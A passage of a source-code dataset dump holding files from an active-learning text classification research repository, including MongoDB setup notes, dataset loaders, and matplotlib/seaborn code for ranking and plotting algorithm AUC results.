(first_mean + first_std).tolist(),\n # (first_mean - first_std).tolist(),\n # color=\"g\",\n # alpha=0.2,\n # label=\"1 std. dev.\",\n # )\n\n plt.xlabel(\"Learning Iterations\")\n plt.ylabel(\"AUC metrics\")\n plt.title(\"AUC and Learning Iterations dependent on choice of new training data\")\n plt.legend(loc=\"lower left\")\n plt.show()\n\n\ndef calculate_binary_metrics(\n true_vs_predicted: List[Dict[str, np.ndarray]], label_to_binary: bool = True\n) -> None:\n\n if label_to_binary:\n true_vs_predicted, unique_values = transform_label_to_binary(true_vs_predicted)\n\n roc_and_auc_metrics(true_vs_predicted)\n plot_precision_recall_curve(true_vs_predicted)\n"
},
{
"alpha_fraction": 0.6657429933547974,
"alphanum_fraction": 0.6737097501754761,
"avg_line_length": 31.066667556762695,
"blob_id": "51c483c68446b067f44092c02d9ce3f74df1628c",
"content_id": "69a1eb5e52468b91c2791b6f8136ca4f4cc769e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2887,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 90,
"path": "/Peony_project/Peony_database/README.md",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "# Peony Database Architecture\n\n## Database Description \n\n\n\nIn this project we decided to work with NoSQL database. Our choice was MongoDb. The reason why we have chosen MongoDb is because of its simplicity and possibility of maintaining through Docker \n\n## Docker + MongoDb\n\nSince Doker and MongoDb is perfect combination, Peony Database can be deployed with two lines of code (Remeber to activate `peony_project` environment)\n1. Run Docker + MongoDb with `docker-compose up -d --build`\n2. Load the data with `python3 fill_in_the_database.py --huffpost <path> --newsgroups <path> --tweets <path> --comments <path> --emotions <path>`. Each parameter representes one dataset.\n200k texts from Huffpost, 20 newsgroups datatset, 1600k tweets, emotions classification.\n\n\n[Huffpost dataset](https://www.kaggle.com/rmisra/news-category-dataset/home)\n[1600k tweets dataset](https://www.kaggle.com/kazanova/sentiment140)\n[20 newsgroups dataset](https://www.kaggle.com/crawford/20-newsgroups)\n//TODO Add references to each dataset\n\n\n\n## MongoDb Data Format \n\nMongoDb represents the data in BSON format behind the scenes but we will send and get JSON format data.\n\n### Datasets and Their Instances\n\nHere is JSON schema of how the data are stored and what a user will get as an output from a database. ([Understanding of JSON schema can be found here](https://json-schema.org/understanding-json-schema/))\n\n```\n{\n\t\"title\": \"PeonyDatabase\",\n\t\"type\": \"object\",\n\t\"properties\": {\n\t\t\"datasetName\": {\n\t\t\t\"type\": \"string\",\n\t\t\t\"description\": \"Name of the dataset\"\n\t\t},\n\t\t\"datasetId\": {\n\t\t\t\"type\": \"int\",\n\t\t\t\"description\": \"Unique hash id that will be created automatically\" \n\t\t},\n\t\t\"record\": {\n\t\t\t\"type\": \"object\",\n\t\t\t\"description\": \"All information about an instance\",\n\t\t\t\"properties\": {\n\t\t\t\t\"id\": {\n\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\"description\": \"Unique hash id that will be created automatically\" \n\t\t\t\t},\n\t\t\t\t\"snippet\": {\n\t\t\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\t\t\"description\": \"Snippet of a text. Can be empty\" \n\t\t\t\t},\n\t\t\t\t\"text\": {\n\t\t\t\t\t\"type\": \"object\",\n\t\t\t\t\t\"description\": \"Text instance that is used for a model\",\n\t\t\t\t\t\"properties\" : {\n\t\t\t\t\t\t\"title\": {\n\t\t\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\t\t\"description\": \"Title of a text. Can be empty\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t\"body\": {\n\t\t\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\t\t\"description\": \"Body of a text\"\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"label\": {\n\t\t\t\t\t\"type\": \"string\",\n\t\t\t\t\t\"description\": \"Label for an instance. Can be empty if this is not validation data\"\n\t\t\t\t},\n\t\t\t\t\"metadata\": {\n\t\t\t\t\t\"type\": \"object\",\n\t\t\t\t\t\"description\": \"Any additional metadata. Can be empty field\"\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t},\n}\n```\n\n\n### Models\n\nIn order to use specific model from PeonyBox in future, a user can store this model model in Peony Database. \n\n//TODO Figure out how models will be stored in the database \n"
},
{
"alpha_fraction": 0.5825175046920776,
"alphanum_fraction": 0.5839160680770874,
"avg_line_length": 29.4255313873291,
"blob_id": "5d34f5204bbe80cecb3cbb912059d064b6867669",
"content_id": "bd99a2913a2be2c831faac03e16653f2739ec219",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1430,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 47,
"path": "/Peony_project/Peony_database/src/datasets/Tweets_emotions_dataset.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport logging\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"Tweets_emotions_dataset\"\nCOLLECTION_ID = 3\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = COLLECTION_ID\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash(\n [record[\"text\"], record[\"date\"], record[\"user\"]]\n )\n transormed_record[\"record\"][\"text\"] = {\"body\": record[\"text\"]}\n transormed_record[\"record\"][\"label\"] = record[\"target\"]\n transormed_record[\"record\"][\"metadata\"] = {\n \"user\": record[\"user\"],\n \"date\": record[\"date\"],\n }\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n data: list = []\n df = pd.read_csv(path, index_col=None, encoding=\"utf8\")\n for _, row in tqdm(df.iterrows()):\n try:\n record = {\n \"target\": row[\"target\"],\n \"text\": row[\"text\"],\n \"date\": row[\"date\"],\n \"user\": row[\"user\"],\n }\n data.append(record)\n except KeyError:\n logging.warning(\n \"Some fields are missing. This record was removed from dataset\"\n )\n return data\n"
},
{
"alpha_fraction": 0.8003754615783691,
"alphanum_fraction": 0.8003754615783691,
"avg_line_length": 75.04762268066406,
"blob_id": "1a788e1bb54ad99927728e122cdf5ed4182043fc",
"content_id": "21cd9d6f67986327959e5699d798bf5038930d44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1598,
"license_type": "no_license",
"max_line_length": 902,
"num_lines": 21,
"path": "/README.md",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "# Peony Project\n\n## Active Learning for Text Classification\n\n\n\n### Abstract \n\nFollowing project is aimed on derivation and testing of active learning techniques for text classification. Active learning method is introduced as semi-supervised learning algorithm that uses annotator's help. When an algorithm is not sure about a label of a specific instance, it will ask an annotator to provide the label. On the basis of the iterative annotators feedback the algorithms have more powerful ability for learning with lower amount of training documents. In this work, term classification is interpreted in different ways such as named entity recognition, anomaly context detection, binary classification, multi-class classification, etc.. In order to solve highlighted problems, in this work are used different methods such as random forests, svms, neural networks, etc.. Each method is defined with respect to decision theory paradigm and tested on real data with visualised results.\n\n### Repository Guide\n\nThis Project is separated into two folders *Peony_research_document* and *Peony_project*. \n\n*Peony_research_document* is a folder with output PDF document and .tex, .lyx files.\n\n*Peopny_project* is a tech folder with codes.\n\n### Peony Deployment\n\nIn order to start working with all Peony dependecies `peony_project` environment must be activated. The easiest way to activate peony environmet is to run `conda env create -f environment.yml` (If you don't have conda, please install it before creating environment). \n"
},
{
"alpha_fraction": 0.7174111008644104,
"alphanum_fraction": 0.7192342877388,
"avg_line_length": 31.264705657958984,
"blob_id": "206c7eb34bcbee8d448d5074851e7fbff4120184",
"content_id": "2ae22700a78fc267ee3a347e1f0c359a706a3a3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1097,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 34,
"path": "/visualize.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from PeonyPackage.PeonyDb import MongoDb\nfrom Peony_visualization.src.peony_visualization import visualize_two_auc_evolutions\n\napi = MongoDb()\n\n# Random acquisition function\nsvm_random_sampling_results = api.get_model_results(\n {\n \"model\": \"bayesian_denfi_nn_hot_start_fast_text_embeddings\",\n \"acquisition_function\": \"random\",\n \"category_1\": \"POSITIVE_EMOTIONS_TWEETS\",\n }\n)\nsvm_random_sampling_results = [\n item for val in svm_random_sampling_results for item in val[\"results\"]\n]\n\n# Entropy acquisition function\nsvm_false_positive_sampling_results = api.get_model_results(\n {\n \"model\": \"bayesian_denfi_nn_hot_start_fast_text_embeddings\",\n \"acquisition_function\": \"entropy\",\n \"category_1\": \"POSITIVE_EMOTIONS_TWEETS\",\n }\n)\nsvm_false_positive_sampling_results = [\n item for val in svm_false_positive_sampling_results for item in val[\"results\"]\n]\n\n# we use zero index because database returns list even if it is only one element in list\n\nvisualize_two_auc_evolutions(\n svm_random_sampling_results, svm_false_positive_sampling_results\n)\n"
},
{
"alpha_fraction": 0.5149959325790405,
"alphanum_fraction": 0.5314779877662659,
"avg_line_length": 33.65355682373047,
"blob_id": "a074ee99c6a4c27c0a708a5dbfae7bf5ec5d7403",
"content_id": "9a371974b2227c39310f635c2f54574d7fc1c821",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18505,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 534,
"path": "/Peony_project/Peony_visualization/src/batch_active_learning_article/rank_aggregations.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import json\nimport pandas as pd\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport math\n\nfrom itertools import chain\nfrom Peony_visualization.src.batch_active_learning_article.result_ids import DATA\nfrom typing import Any, Dict, List, Optional\nfrom matplotlib.ticker import FormatStrFormatter\n\n\ndef plot_batch_evolutions(dfs: List[pd.DataFrame]) -> None:\n\n results = {}\n batches = list(reversed([int(df.columns[1].split(\"_\")[0]) for df in dfs]))\n markevery = 1\n\n algos_2_plot = [\"nn_warm_start_entropy\", \"nn_warm_start_bald\", \"nn_min_margin\", \"mc_dropout_entropy\"]\n\n for df in dfs:\n for _, (algo, algo_mean, algo_std) in df.iterrows():\n if algo in algos_2_plot:\n results.setdefault(algo, {\"mean\": [], \"std\": []})\n results[algo][\"mean\"].append(algo_mean)\n results[algo][\"std\"].append(algo_std)\n\n for algo, stats in results.items():\n stats[\"mean\"] = list(reversed(stats[\"mean\"]))\n stats[\"std\"] = list(reversed(stats[\"std\"]))\n plt.grid(alpha=0.2)\n plt.plot(\n batches,\n stats[\"mean\"],\n linestyle=\"--\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=algo,\n alpha=0.4,\n )\n upper_bound = [m + s for m, s in zip(stats[\"mean\"], stats[\"std\"])]\n lower_bound = [m - s for m, s in zip(stats[\"mean\"], stats[\"std\"])]\n plt.plot(batches, upper_bound, linestyle=\"-\", color=\"b\", alpha=0.1)\n plt.plot(batches, lower_bound, linestyle=\"-\", color=\"b\", alpha=0.1)\n\n plt.fill_between(\n batches,\n upper_bound,\n lower_bound,\n alpha=0.05,\n color=\"b\",\n )\n\n plt.show()\n\n\ndef heatmap_batch(\n dfs: List[pd.DataFrame],\n alg_title: Optional[str] = None,\n subplot: Optional[Any] = None,\n label_size: int = 8,\n) -> None:\n df = dfs[0].merge(dfs[1], how=\"left\").merge(dfs[2], how=\"left\").merge(dfs[3], how=\"left\")\n df_h = df[[\"10_ranks_mean\", \"20_ranks_mean\", \"50_ranks_mean\", \"100_ranks_mean\"]]\n\n # fig, ax = plt.subplots(figsize=(8, 6))\n if subplot is not None:\n sns.set(font_scale=1.12)\n ax = sns.heatmap(\n df_h,\n cmap=\"Blues_r\",\n linewidths=0.0,\n annot=True,\n xticklabels=[\"10\\n \", \"20\\n \", \"50\\n \", \"100\\n \"],\n yticklabels=[\n \"HAC\\nMin-margin\",\n \"MC Dropout\\nHAC Entropy\",\n \"MC Dropout\\nHAC BALD\",\n \"MC Dropout\\nEntropy\",\n \"MC Dropout\\nBALD\",\n \"MC Dropout\\nRandom\",\n \"HAC Entropy\\nNN Warm-start\",\n # \"NN HAC BALD\\nWarm-start\",\n \"NN Entropy\\nWarm-start\",\n # \"NN BALD\\nWarm-start\",\n \"NN Random\\nWarm-start\",\n \"NN Entropy\\nCold-start\",\n \"NN Random\\nCold-start\",\n ],\n vmin=math.floor(df_h.min().min()),\n vmax=math.ceil(df_h.max().max()),\n ax=subplot,\n cbar=False,\n )\n ax.tick_params(labelsize=label_size)\n ax.set_title(\n \"Aggregated batch size mean rank through all algorithms\" if not alg_title else alg_title,\n pad=20,\n fontsize=label_size + 4,\n )\n # ax.set_yticklabels(ax.get_yticklabels(), rotation=40)\n else:\n ax = sns.heatmap(\n df_h,\n cmap=\"Blues_r\",\n linewidths=0.0,\n annot=True,\n xticklabels=[\"10\\n \", \"20\\n \", \"50\\n \", \"100\\n \"],\n yticklabels=[\n \"HAC\\nMin-margin\",\n \"MC Dropout\\nHAC Entropy\",\n \"MC Dropout\\nHAC BALD\",\n \"MC Dropout\\nEntropy\",\n \"MC Dropout\\nBALD\",\n \"MC Dropout\\nRandom\",\n \"NN HAC Entropy\\nWarm-start\",\n # \"NN HAC BALD\\nWarm-start\",\n \"NN Entropy\\nWarm-start\",\n # \"NN BALD\\nWarm-start\",\n \"NN Random\\nWarm-start\",\n ],\n vmin=math.floor(df_h.min().min()),\n vmax=math.ceil(df_h.max().max()),\n )\n ax.tick_params(labelsize=label_size)\n ax.set_title(\n f\"Aggregated batch size mean rank through {'all algorithms' if not alg_title else alg_title}\",\n pad=20,\n )\n plt.tight_layout()\n plt.show()\n\n\ndef heatmap_datasets(dfs: List[pd.DataFrame]) -> None:\n\n if len(dfs) == 3:\n df = dfs[0].merge(dfs[1], how=\"left\").merge(dfs[2], how=\"left\")\n\n df_h = df[\n [\n \"Amazon Review 3, 5_ranks_mean\",\n \"Fake news detection_ranks_mean\",\n \"Tweet_emotion_detection_ranks_mean\",\n ]\n ]\n\n xlabels = [\n \"Amazon\\nReviews 3, 5\",\n \"Fake News\\nDetection\",\n \"Twitter\\nSentiment\",\n ]\n\n ylabels = [\n \"HAC\\nMin-margin\",\n \"MC Dropout\\nHAC Entropy\",\n \"MC Dropout\\nHAC BALD\",\n \"MC Dropout\\nEntropy\",\n \"MC Dropout\\nBALD\",\n \"MC Dropout\\nRandom\",\n \"DEnFi\\nHAC Entropy\",\n \"DEnFi\\nHAC BALD\",\n \"DEnFi\\nEntropy\",\n \"DEnFi\\nBALD\",\n \"DEnFi\\nRandom\",\n \"NN HAC Entropy\\nWarm-start\",\n # \"NN HAC BALD\\nWarm-start\",\n \"NN Entropy\\nWarm-start\",\n # \"NN BALD\\nWarm-start\",\n \"NN Random\\nWarm-start\",\n \"NN Entropy\\nCold-start\",\n \"NN Random\\nCold-start\",\n ]\n\n # fig, ax = plt.subplots(figsize=(8, 6))\n sns.set(font_scale=1)\n ax = sns.heatmap(\n df_h.transpose(),\n cmap=\"Blues_r\",\n linewidths=0.0,\n annot=True,\n xticklabels=ylabels,\n yticklabels=xlabels,\n vmin=math.floor(df_h.min().min()),\n vmax=math.ceil(df_h.max().max()),\n # cbar=False if index == 1 else True,\n )\n ax.tick_params(labelsize=10)\n ax.set_xticklabels(ax.get_xticklabels(), rotation=45)\n ax.set_yticklabels(ax.get_yticklabels(), rotation=0)\n # ax.set_title(\"Aggregated mean rank given datasets and algorithm\", pad=20)\n plt.tight_layout()\n plt.show()\n\n else:\n df = (\n dfs[0]\n .merge(dfs[1], how=\"left\")\n .merge(dfs[2], how=\"left\")\n .merge(dfs[3], how=\"left\")\n .merge(dfs[4], how=\"left\")\n )\n\n df_h = df[\n [\n \"Amazon Review 1, 5_ranks_mean\",\n \"Amazon Review 3, 5_ranks_mean\",\n \"Gibberish_ranks_mean\",\n \"Fake news detection_ranks_mean\",\n \"Tweet_emotion_detection_ranks_mean\",\n ]\n ]\n\n xlabels = [\n \"Amazon\\nReviews 1, 5\",\n \"Amazon\\nReviews 3, 5\",\n \"Gibberish\",\n \"Fake News\\nDetection\",\n \"Twitter\\nSentiment\",\n ]\n ylabels = [\n \"HAC\\nMin-margin\",\n \"MC Dropout\\nHAC Entropy\",\n \"MC Dropout\\nHAC BALD\",\n \"MC Dropout\\nEntropy\",\n \"MC Dropout\\nBALD\",\n \"MC Dropout\\nRandom\",\n \"NN HAC Entropy\\nWarm-start\",\n # \"NN HAC BALD\\nWarm-start\",\n \"NN Entropy\\nWarm-start\",\n # \"NN BALD\\nWarm-start\",\n \"NN Random\\nWarm-start\",\n ]\n\n # fig, ax = plt.subplots(figsize=(8, 6))\n ax = sns.heatmap(\n df_h,\n cmap=\"Blues_r\",\n linewidths=0.0,\n annot=True,\n xticklabels=xlabels,\n yticklabels=ylabels,\n vmin=math.floor(df_h.min().min()),\n vmax=math.ceil(df_h.max().max()),\n )\n ax.tick_params(labelsize=8)\n ax.set_xticklabels(ax.get_xticklabels(), rotation=0)\n # ax.set_yticklabels(ax.get_yticklabels(), rotation=90)\n # ax.set_title(\"Aggregated mean rank given datasets and algorithm\", pad=20)\n plt.tight_layout()\n plt.show()\n\n\ndef get_collection_results() -> Dict[str, List[List[float]]]:\n collection_results = {}\n with open(\"Peony_visualization/src/batch_active_learning_article/collection.json\", \"r\") as f:\n for l in f.readlines():\n data = json.loads(l)\n collection_results[data[\"_id\"][\"$oid\"]] = data[\"results\"]\n return collection_results\n\n\ndef merge_resuls_and_metadata(\n resutls: Dict[str, List[List[float]]], metadata: List[List[str]]\n) -> pd.DataFrame:\n list_2_df: List[Any] = []\n for row in metadata:\n id_res = np.array(resutls[row[0]]).squeeze(2)\n\n batch = re.search(r\"(100|50|20|10)\", row[2])\n batch_span = batch.span() # type: ignore\n batch_int = int(batch.group(0)) # type: ignore\n\n warm_start = re.search(r\"warm_start\", row[2])\n cold_start = re.search(r\"cold_start\", row[2])\n if warm_start:\n alg = row[2][: batch_span[0] - 1] + \"_warm_start_\" + row[3]\n elif cold_start:\n alg = row[2][: batch_span[0] - 1] + \"_cold_start_\" + row[3]\n else:\n alg = row[2][: batch_span[0] - 1] + \"_\" + row[3]\n mean = np.mean(id_res, axis=0)\n std = np.std(id_res, axis=0)\n list_2_df.append(row[0:2] + [alg, batch_int, id_res, mean, std])\n header = [\"id\", \"dataset\", \"algorithm\", \"batch\", \"results\", \"results_mean\", \"results_std\"]\n df = pd.DataFrame(list_2_df)\n df.columns = header\n return df\n\n\ndef get_ranks(df: pd.DataFrame) -> pd.DataFrame:\n results = df[\"results_mean\"].to_list()\n sorted_results = []\n for v in zip(*results):\n res = list(zip(*sorted(zip(*[v, list(range(1, len(v) + 1))]), key=lambda x: x[0], reverse=True)))[1]\n\n sorted_results.append(\n list(zip(*sorted(zip(*[res, list(range(1, len(v) + 1))]), key=lambda x: x[0])))[1]\n )\n transposed_sorted_results = list(zip(*sorted_results))\n\n df = pd.DataFrame(list(zip(df[\"algorithm\"].to_list(), transposed_sorted_results)))\n df.columns = [\"algorithm\", \"ranks\"]\n return df\n\n\ndef aggregate_ranks_through_batches(ranks: List[List[float]], std=False) -> List[float]:\n\n results = []\n for res_list in ranks:\n step = len(res_list) // 10\n for i in range(0, len(res_list), step):\n results.append(res_list[i])\n\n return np.mean(results) if std == False else np.std(results)\n\n\ndef get_batch_rank(df: pd.DataFrame) -> List[pd.DataFrame]:\n df_100 = df[df[\"batch\"] == 100]\n df_50 = df[df[\"batch\"] == 50]\n df_20 = df[df[\"batch\"] == 20]\n df_10 = df[df[\"batch\"] == 10]\n\n def group_by(df: pd.DataFrame, batch_size: str) -> pd.DataFrame:\n df_by_datasets = pd.concat(\n [get_ranks(df[df[\"dataset\"] == dataset]) for dataset in set(df[\"dataset\"].to_list())]\n )\n df_mean = (\n df_by_datasets.groupby(\"algorithm\", sort=False)\n .apply(lambda x: aggregate_ranks_through_batches(list(x[\"ranks\"])))\n .reset_index()\n )\n df_mean.columns = [\"algorithm\", f\"{batch_size}_ranks_mean\"]\n df_std = (\n df_by_datasets.groupby(\"algorithm\", sort=False)\n .apply(lambda x: aggregate_ranks_through_batches(list(x[\"ranks\"]), True))\n .reset_index()\n )\n df_std.columns = [\"algorithm\", f\"{batch_size}_ranks_std\"]\n df = df_mean[[\"algorithm\", f\"{batch_size}_ranks_mean\"]]\n df[f\"{batch_size}_ranks_std\"] = df_std[f\"{batch_size}_ranks_std\"]\n return df.round(3)\n\n return [group_by(df_100, \"100\"), group_by(df_50, \"50\"), group_by(df_20, \"20\"), group_by(df_10, \"10\")]\n\n\ndef get_dataset_rank(df: pd.DataFrame) -> List[pd.DataFrame]:\n dfs = [df[df[\"dataset\"] == dataset] for dataset in set(df[\"dataset\"].to_list())]\n\n def group_by(df: pd.DataFrame, dataset: str) -> pd.DataFrame:\n df_by_datasets = pd.concat(\n [get_ranks(df[df[\"batch\"] == batch]) for batch in set(df[\"batch\"].to_list())]\n )\n df_mean = (\n df_by_datasets.groupby(\"algorithm\", sort=False)\n .apply(lambda x: aggregate_ranks_through_batches(list(x[\"ranks\"])))\n .reset_index()\n )\n df_mean.columns = [\"algorithm\", f\"{dataset}_ranks_mean\"]\n df_std = (\n df_by_datasets.groupby(\"algorithm\", sort=False)\n .apply(lambda x: aggregate_ranks_through_batches(list(x[\"ranks\"]), True))\n .reset_index()\n )\n df_std.columns = [\"algorithm\", f\"{dataset}_ranks_std\"]\n df = df_mean[[\"algorithm\", f\"{dataset}_ranks_mean\"]]\n df[f\"{dataset}_ranks_std\"] = df_std[f\"{dataset}_ranks_std\"]\n return df.round(3)\n\n return [group_by(dataframe, dataset) for dataframe, dataset in zip(dfs, set(df[\"dataset\"].to_list()))]\n\n\ndef get_batch_rank_subplots(df: pd.DataFrame) -> None:\n label_size = 11.2\n heatmap_batch(get_batch_rank(df), \"All Datasets\", plt.subplot(2, 3, 1), label_size)\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Tweet_emotion_detection\"]),\n \"Twitter Sentiment\",\n plt.subplot(2, 3, 2),\n label_size,\n )\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Gibberish\"]), \"Gibberish\", plt.subplot(2, 3, 3), label_size\n )\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Amazon Review 3, 5\"]),\n \"Amazon Reviews 3, 5\",\n plt.subplot(2, 3, 4),\n label_size,\n )\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Amazon Review 1, 5\"]),\n \"Amazon Reviews 1, 5\",\n plt.subplot(2, 3, 5),\n label_size,\n )\n heatmap_batch(\n get_batch_rank(df[df[\"dataset\"] == \"Fake news detection\"]),\n \"Fake News Detection\",\n plt.subplot(2, 3, 6),\n label_size,\n )\n #plt.tight_layout()\n plt.show()\n\n\ndef get_batch_rank_subplots_denfi(df: pd.DataFrame) -> None:\n df_denfi = df[\n (df[\"batch\"] == 20) & (df[\"dataset\"] != \"Gibberish\") & (df[\"dataset\"] != \"Amazon Review 1, 5\")\n ]\n dataset_ranks = get_dataset_rank(df_denfi)\n heatmap_datasets(dataset_ranks)\n # algos = [\n # \"nn_min_margin\",\n # \"denfi_hac_entropy\",\n # \"denfi_hac_bald\",\n # \"denfi_entropy\",\n # \"denfi_bald\",\n # \"denfi_random\",\n # \"mc_dropout_random\",\n # ]\n # first_subplot = [d_r[d_r[\"algorithm\"].isin(algos)] for d_r in dataset_ranks]\n # second_subplot = [d_r[~d_r[\"algorithm\"].isin(algos)] for d_r in dataset_ranks]\n\n # label_size = 13.5\n\n # df = dataset_ranks[0].merge(dataset_ranks[1], how=\"left\").merge(dataset_ranks[2], how=\"left\")\n\n # df_h = df[\n # [\n # \"Amazon Review 3, 5_ranks_mean\",\n # \"Fake news detection_ranks_mean\",\n # \"Tweet_emotion_detection_ranks_mean\",\n # ]\n # ]\n\n # min_v = math.floor(df_h.min().min())\n # max_v = math.floor(df_h.max().max())\n # heatmap_datasets(first_subplot, 1, plt.subplot(1, 2, 1), min_v, max_v)\n # heatmap_datasets(second_subplot, 2, plt.subplot(1, 2, 2), min_v, max_v)\n # # plt.tight_layout()\n plt.show()\n\n\ndef plot_auc_for_batches(df):\n datasets = {\n \"Tweet_emotion_detection\": \"Twitter\\nSentiment\",\n \"Gibberish\": \"Gibberish\\n\",\n \"Amazon Review 3, 5\": \"Amazon\\nReviews 3, 5\",\n \"Amazon Review 1, 5\": \"Amazon\\nReviews 1, 5\",\n \"Fake news detection\": \"Fake News\\nDetection\",\n }\n algorithms = {\n \"nn_min_margin\": \"HAC\\nMin-margin\",\n \"mc_dropout_hac_entropy\": \"MC Dropout\\nHAC Entropy\",\n \"mc_dropout_hac_bald\": \"MC Dropout\\nHAC BALD\",\n \"mc_dropout_entropy\": \"MC Dropout\\nEntropy\",\n \"mc_dropout_bald\": \"MC Dropout\\nBALD\",\n \"mc_dropout_random\": \"MC Dropout\\nRandom\",\n # \"denfi_hac_entropy\": \"DEnFi\\nHAC Entropy\",\n # \"denfi_hac_bald\": \"DEnFi\\nHAC BALD\",\n # \"denfi_entropy\": \"DEnFi\\nEntropy\",\n # \"denfi_bald\": \"DEnFi\\nBALD\",\n # \"denfi_random\": \"DEnFi\\nRandom\",\n \"nn_warm_start_hac_entropy\": \"NN HAC\\nEntropy\\nWarm-start\",\n \"nn_warm_start_entropy\": \"NN Entropy\\nWarm-start\",\n \"nn_warm_start_random\": \"NN Random\\nWarm-start\",\n \"nn_cold_start_entropy\": \"NN Entropy\\nCold-start\",\n \"nn_cold_start_random\": \"NN Random\\nCold-start\"\n }\n batches = [10, 20, 50, 100]\n for i, (dataset, dataset_title) in enumerate(datasets.items()):\n ax = plt.subplot(1, 5, i + 1)\n for algo, algo_title in algorithms.items():\n auc_means = [\n round(\n df[(df[\"dataset\"] == dataset) & (df[\"algorithm\"] == algo) & (df[\"batch\"] == batch)][\n \"results_mean\"\n ].tolist()[0][-1],\n 3,\n )\n for batch in batches\n ]\n ax.plot([1, 2, 3, 4], auc_means, linestyle=\"-\", marker=\"+\", markevery=1, lw=1, label=algo_title)\n ax.grid(alpha=0.2)\n ax.set_xlabel(\"Batch size\")\n ax.set_xlim(0.5, 4.5)\n if i == 0:\n ax.set_ylabel(\"AUC\", fontsize=13.5)\n ax.set_title(dataset_title, fontsize=15)\n ax.set_xticklabels([\" \", 10, 20, 50, 100], fontsize=12)\n ax.yaxis.set_major_formatter(FormatStrFormatter(\"%.2f\"))\n\n handles, labels = ax.get_legend_handles_labels()\n plt.figlegend(handles, labels, loc=\"lower center\", ncol=5, fontsize=11)\n plt.subplots_adjust(bottom=0.3)\n plt.show()\n\n\ndef main():\n collection_results = get_collection_results()\n df = merge_resuls_and_metadata(collection_results, DATA)\n df = df[(df[\"algorithm\"] != \"nn_warm_start_hac_bald\") & (df[\"algorithm\"] != \"nn_warm_start_bald\")]\n\n #plot_auc_for_batches(df)\n\n # Without DEnFi\n df_r = df[df[\"algorithm\"].str.match(r\"^denfi\") != True] # In case u want to exclude DEnFi\n\n batch_ranks = get_batch_rank(df_r)\n # plot_batch_evolutions(batch_ranks)\n # heatmap_batch(batch_ranks)\n\n #get_batch_rank_subplots(df_r)\n\n # batch_ranks[0].to_clipboard(header=False, index=False)\n\n # dataset_ranks = get_dataset_rank(df_r)\n # heatmap_datasets(dataset_ranks)\n\n # With data that include DEnFi\n df_denfi = df[\n (df[\"batch\"] == 20) & (df[\"dataset\"] != \"Gibberish\") & (df[\"dataset\"] != \"Amazon Review 1, 5\")\n ]\n dataset_ranks = get_dataset_rank(df_denfi)\n heatmap_datasets(dataset_ranks)\n # dataset_ranks[0].to_clipboard(header=False, index=False)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6520618796348572,
"alphanum_fraction": 0.6520618796348572,
"avg_line_length": 17.428571701049805,
"blob_id": "db46bcbab81f2294e9152d157482b1fb05be1045",
"content_id": "ced9e074d11cc10b766f58cfab926c81683ea2f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 21,
"path": "/Peony_project/delete_record.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import argparse\n\nfrom PeonyPackage.PeonyDb import MongoDb\nfrom bson.objectid import ObjectId\n\n\ndef input_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--id\")\n return parser\n\n\ndef main():\n args = input_args().parse_args()\n\n api = MongoDb()\n api.database[\"models_results\"].delete_one({'_id': ObjectId(args.id)})\n\n\nif __name__==\"__main__\":\n main()\n\n"
}
] | 44 |
junho-one/AILaw
|
https://github.com/junho-one/AILaw
|
0865e05457e6864b22157a927f5b5d287e1b4ccb
|
829c02c497aacae3da81f82e9e9f61db352334db
|
c300eb455b7c469fa588072dab6751b92eaed7ac
|
refs/heads/master
| 2023-07-16T20:44:09.962258 | 2021-08-26T02:18:57 | 2021-08-26T02:18:57 | 289,670,685 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.668350100517273,
"alphanum_fraction": 0.6753935217857361,
"avg_line_length": 35.91889572143555,
"blob_id": "556c6b629ec046a813bd0a3a42c28fed0b0cff9b",
"content_id": "383f054b9749c54cdc89c35f27c5a1c5d54eb155",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 44207,
